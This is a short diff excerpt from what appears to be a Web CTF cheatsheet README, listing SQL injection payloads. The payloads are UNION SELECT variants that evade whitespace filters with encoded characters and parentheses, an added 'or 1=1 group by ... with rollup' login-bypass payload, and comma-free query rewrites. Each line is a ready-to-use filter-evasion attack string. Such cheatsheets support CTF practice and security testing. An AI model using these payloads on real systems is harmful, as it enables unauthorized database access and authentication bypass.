w181496/Web-CTF-Cheatsheet/README.md

     - `id=-1%09UNION%0DSELECT%0A1,2,3`
     - `id=(-1)UNION(SELECT(1),2,3)`

+- group by with rollup
+    - `' or 1=1 group by pwd with rollup limit 1 offset 2#`

 - 不使用逗號
     - `LIMIT N, M` => `LIMIT M OFFSET N`
     - `mid(user(), 1, 1)` => `mid(user() from 1 for 1)`